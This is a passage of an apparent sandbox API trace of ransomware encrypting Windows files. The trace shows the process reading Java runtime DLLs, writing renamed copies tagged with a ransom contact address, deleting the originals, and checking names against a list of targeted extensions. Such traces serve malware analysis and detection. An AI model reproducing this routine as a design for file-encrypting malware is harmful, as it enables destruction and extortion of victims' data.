Files\\Java\\jre1.8.0_144\\bin\\jp2iexp.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jp2iexp.dll")) returned 0x20 [0197.448] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2iexp.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jp2iexp.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0197.448] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2iexp.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jp2iexp.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0197.448] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.448] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.448] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2iexp.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jp2iexp.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0197.448] GetLastError () returned 0x0 [0197.449] ReadFile (in: hFile=0x350, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0x48440, lpOverlapped=0x0) returned 1 [0197.493] WriteFile (in: hFile=0x3a0, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0x48450, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0x48450, lpOverlapped=0x0) returned 1 [0197.504] ReadFile (in: hFile=0x350, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0x0, lpOverlapped=0x0) returned 1 [0197.504] WriteFile (in: hFile=0x3a0, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0xea, lpOverlapped=0x0) returned 1 [0197.504] SetEndOfFile (hFile=0x3a0) returned 1 [0197.504] CloseHandle (hObject=0x3a0) returned 1 [0197.504] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.504] SetEndOfFile (hFile=0x350) returned 1 [0197.507] CloseHandle (hObject=0x350) returned 1 [0197.507] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2iexp.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0197.508] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2iexp.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jp2iexp.dll")) returned 1 [0197.508] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2iexp.dll") returned 50 [0197.508] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2iexp.dll") returned 50 [0197.508] lstrlenW (lpString=".doc") returned 4 [0197.508] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0197.508] lstrlenW (lpString=".docx") returned 5 [0197.508] lstrcmpiW (lpString1=".docx", lpString2="p.dll") returned -1 [0197.508] lstrlenW (lpString=".pdf") returned 4 [0197.508] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0197.508] lstrlenW (lpString=".xls") returned 4 [0197.508] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0197.508] lstrlenW (lpString=".xlsx") returned 5 [0197.508] lstrcmpiW (lpString1=".xlsx", lpString2="p.dll") returned -1 [0197.508] lstrlenW (lpString=".ppt") returned 4 [0197.508] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0197.509] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2iexp.dll") returned 50 [0197.509] lstrlenW (lpString=".zip") returned 4 [0197.509] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0197.509] lstrlenW (lpString=".rar") returned 4 [0197.509] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0197.509] lstrlenW (lpString=".bz2") returned 4 [0197.509] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0197.509] lstrlenW (lpString=".7z") returned 3 [0197.509] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0197.509] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2iexp.dll") returned 50 [0197.509] lstrlenW (lpString=".dbf") returned 4 [0197.509] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0197.509] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2iexp.dll") returned 50 [0197.509] lstrlenW (lpString=".1cd") returned 4 [0197.509] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0197.509] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2iexp.dll") returned 50 [0197.509] lstrlenW (lpString=".jpg") returned 4 [0197.509] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0197.509] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2iexp.dll") returned 50 [0197.509] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2iexp.dll") returned 50 [0197.509] lstrlenW (lpString=".doc") returned 4 [0197.509] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0197.509] lstrlenW (lpString=".docx") returned 5 [0197.509] lstrcmpiW (lpString1=".docx", lpString2="p.dll") returned -1 [0197.509] lstrlenW (lpString=".pdf") returned 4 [0197.509] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0197.509] lstrlenW (lpString=".xls") returned 4 [0197.510] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0197.510] lstrlenW (lpString=".xlsx") returned 5 [0197.510] lstrcmpiW (lpString1=".xlsx", lpString2="p.dll") returned -1 [0197.510] lstrlenW (lpString=".ppt") returned 4 [0197.510] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0197.510] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2iexp.dll") returned 50 [0197.510] lstrlenW (lpString=".zip") returned 4 [0197.510] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0197.510] lstrlenW (lpString=".rar") returned 4 [0197.510] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0197.510] lstrlenW (lpString=".bz2") returned 4 [0197.510] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0197.510] lstrlenW (lpString=".7z") returned 3 [0197.510] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0197.510] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2iexp.dll") returned 50 [0197.510] lstrlenW (lpString=".dbf") returned 4 [0197.510] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0197.510] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2iexp.dll") returned 50 [0197.510] lstrlenW (lpString=".1cd") returned 4 [0197.510] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0197.510] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2iexp.dll") returned 50 [0197.510] lstrlenW (lpString=".jpg") returned 4 [0197.510] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0197.510] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0197.510] lstrlenW (lpString="jp2native.dll") returned 13 [0197.511] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2native.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jp2native.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0197.511] GetFileSizeEx (in: hFile=0x350, lpFileSize=0x34dff14 | out: lpFileSize=0x34dff14*=20032) returned 1 [0197.511] CloseHandle (hObject=0x350) returned 1 [0197.511] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2native.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jp2native.dll")) returned 0x20 [0197.511] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2native.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jp2native.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0197.511] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2native.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jp2native.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0197.512] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.512] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.512] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2native.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jp2native.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0197.512] GetLastError () returned 0x0 [0197.512] ReadFile (in: hFile=0x350, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0x4e40, lpOverlapped=0x0) returned 1 [0197.556] WriteFile (in: hFile=0x3a0, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0x4e50, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0x4e50, lpOverlapped=0x0) returned 1 [0197.557] ReadFile (in: hFile=0x350, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0x0, lpOverlapped=0x0) returned 1 [0197.557] WriteFile (in: hFile=0x3a0, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0xee, lpOverlapped=0x0) returned 1 [0197.558] SetEndOfFile (hFile=0x3a0) returned 1 [0197.558] CloseHandle (hObject=0x3a0) returned 1 [0197.558] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.558] SetEndOfFile (hFile=0x350) returned 1 [0197.559] CloseHandle (hObject=0x350) returned 1 [0197.559] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2native.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0197.559] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2native.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jp2native.dll")) returned 1 [0197.560] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2native.dll") returned 52 [0197.560] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2native.dll") returned 52 [0197.560] lstrlenW (lpString=".doc") returned 4 [0197.560] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0197.560] lstrlenW (lpString=".docx") returned 5 [0197.560] lstrcmpiW (lpString1=".docx", lpString2="e.dll") returned -1 [0197.560] lstrlenW (lpString=".pdf") returned 4 [0197.560] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0197.560] lstrlenW (lpString=".xls") returned 4 [0197.560] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0197.560] lstrlenW (lpString=".xlsx") returned 5 [0197.560] lstrcmpiW (lpString1=".xlsx", lpString2="e.dll") returned -1 [0197.560] lstrlenW (lpString=".ppt") returned 4 [0197.560] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0197.560] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2native.dll") returned 52 [0197.560] lstrlenW (lpString=".zip") returned 4 [0197.560] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0197.560] lstrlenW (lpString=".rar") returned 4 [0197.560] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0197.560] lstrlenW (lpString=".bz2") returned 4 [0197.560] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0197.560] lstrlenW (lpString=".7z") returned 3 [0197.560] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0197.560] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2native.dll") returned 52 [0197.560] lstrlenW (lpString=".dbf") returned 4 [0197.561] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0197.561] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2native.dll") returned 52 [0197.561] lstrlenW (lpString=".1cd") returned 4 [0197.561] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0197.561] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2native.dll") returned 52 [0197.561] lstrlenW (lpString=".jpg") returned 4 [0197.561] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0197.561] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2native.dll") returned 52 [0197.561] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2native.dll") returned 52 [0197.561] lstrlenW (lpString=".doc") returned 4 [0197.561] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0197.561] lstrlenW (lpString=".docx") returned 5 [0197.561] lstrcmpiW (lpString1=".docx", lpString2="e.dll") returned -1 [0197.561] lstrlenW (lpString=".pdf") returned 4 [0197.561] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0197.561] lstrlenW (lpString=".xls") returned 4 [0197.561] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0197.561] lstrlenW (lpString=".xlsx") returned 5 [0197.561] lstrcmpiW (lpString1=".xlsx", lpString2="e.dll") returned -1 [0197.561] lstrlenW (lpString=".ppt") returned 4 [0197.561] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0197.561] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2native.dll") returned 52 [0197.561] lstrlenW (lpString=".zip") returned 4 [0197.561] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0197.561] lstrlenW (lpString=".rar") returned 4 [0197.561] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0197.562] lstrlenW (lpString=".bz2") returned 4 [0197.562] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0197.562] lstrlenW (lpString=".7z") returned 3 [0197.562] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0197.562] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2native.dll") returned 52 [0197.562] lstrlenW (lpString=".dbf") returned 4 [0197.562] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0197.562] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2native.dll") returned 52 [0197.562] lstrlenW (lpString=".1cd") returned 4 [0197.563] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0197.563] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2native.dll") returned 52 [0197.563] lstrlenW (lpString=".jpg") returned 4 [0197.563] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0197.563] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0197.564] lstrlenW (lpString="jsdt.dll") returned 8 [0197.564] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsdt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jsdt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0197.564] GetFileSizeEx (in: hFile=0x350, lpFileSize=0x34dff14 | out: lpFileSize=0x34dff14*=18496) returned 1 [0197.564] CloseHandle (hObject=0x350) returned 1 [0197.564] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsdt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jsdt.dll")) returned 0x20 [0197.564] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsdt.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jsdt.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0197.564] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsdt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jsdt.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0197.565] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.565] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.565] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsdt.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jsdt.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0197.566] GetLastError () returned 0x0 [0197.566] ReadFile (in: hFile=0x350, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0x4840, lpOverlapped=0x0) returned 1 [0197.863] WriteFile (in: hFile=0x3a0, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0x4850, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0x4850, lpOverlapped=0x0) returned 1 [0197.987] ReadFile (in: hFile=0x350, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0x0, lpOverlapped=0x0) returned 1 [0197.987] WriteFile (in: hFile=0x3a0, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0xe4, lpOverlapped=0x0) returned 1 [0197.988] SetEndOfFile (hFile=0x3a0) returned 1 [0197.988] CloseHandle (hObject=0x3a0) returned 1 [0197.988] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.988] SetEndOfFile (hFile=0x350) returned 1 [0197.989] CloseHandle (hObject=0x350) returned 1 [0197.989] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsdt.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0197.989] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsdt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jsdt.dll")) returned 1 [0197.989] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsdt.dll") returned 47 [0197.989] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsdt.dll") returned 47 [0197.989] lstrlenW (lpString=".doc") returned 4 [0197.990] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0197.990] lstrlenW (lpString=".docx") returned 5 [0197.990] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1 [0197.990] lstrlenW (lpString=".pdf") returned 4 [0197.990] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0197.990] lstrlenW (lpString=".xls") returned 4 [0197.990] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0197.990] lstrlenW (lpString=".xlsx") returned 5 [0197.990] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1 [0197.990] lstrlenW (lpString=".ppt") returned 4 [0197.990] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0197.990] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsdt.dll") returned 47 [0197.990] lstrlenW (lpString=".zip") returned 4 [0197.990] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0197.990] lstrlenW (lpString=".rar") returned 4 [0197.990] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0197.990] lstrlenW (lpString=".bz2") returned 4 [0197.990] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0197.990] lstrlenW (lpString=".7z") returned 3 [0197.990] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0197.990] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsdt.dll") returned 47 [0197.990] lstrlenW (lpString=".dbf") returned 4 [0197.990] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0197.990] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsdt.dll") returned 47 [0197.990] lstrlenW (lpString=".1cd") returned 4 [0197.990] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0197.990] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsdt.dll") returned 47 [0197.990] lstrlenW (lpString=".jpg") returned 4 [0197.990] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0197.991] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsdt.dll") returned 47 [0197.991] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsdt.dll") returned 47 [0197.991] lstrlenW (lpString=".doc") returned 4 [0197.991] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0197.991] lstrlenW (lpString=".docx") returned 5 [0197.991] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1 [0197.991] lstrlenW (lpString=".pdf") returned 4 [0197.991] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0197.991] lstrlenW (lpString=".xls") returned 4 [0197.991] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0197.991] lstrlenW (lpString=".xlsx") returned 5 [0197.991] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1 [0197.991] lstrlenW (lpString=".ppt") returned 4 [0197.991] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0197.991] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsdt.dll") returned 47 [0197.991] lstrlenW (lpString=".zip") returned 4 [0197.991] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0197.991] lstrlenW (lpString=".rar") returned 4 [0197.991] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0197.991] lstrlenW (lpString=".bz2") returned 4 [0197.991] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0197.991] lstrlenW (lpString=".7z") returned 3 [0197.991] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0197.991] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsdt.dll") returned 47 [0197.991] lstrlenW (lpString=".dbf") returned 4 [0197.991] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0197.991] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsdt.dll") returned 47 [0197.991] lstrlenW (lpString=".1cd") returned 4 [0197.992] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0197.992] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsdt.dll") returned 47 [0197.992] lstrlenW (lpString=".jpg") returned 4 [0197.992] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0197.992] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0197.992] lstrlenW (lpString="msvcr100.dll") returned 12 [0197.992] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcr100.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\msvcr100.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0197.992] GetFileSizeEx (in: hFile=0x350, lpFileSize=0x34dff14 | out: lpFileSize=0x34dff14*=829264) returned 1 [0197.993] CloseHandle (hObject=0x350) returned 1 [0197.993] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcr100.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\msvcr100.dll")) returned 0x20 [0197.993] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcr100.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\msvcr100.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0197.993] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcr100.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\msvcr100.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0197.993] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.993] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.993] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcr100.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\msvcr100.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0197.994] GetLastError () returned 0x0 [0197.994] ReadFile (in: hFile=0x350, 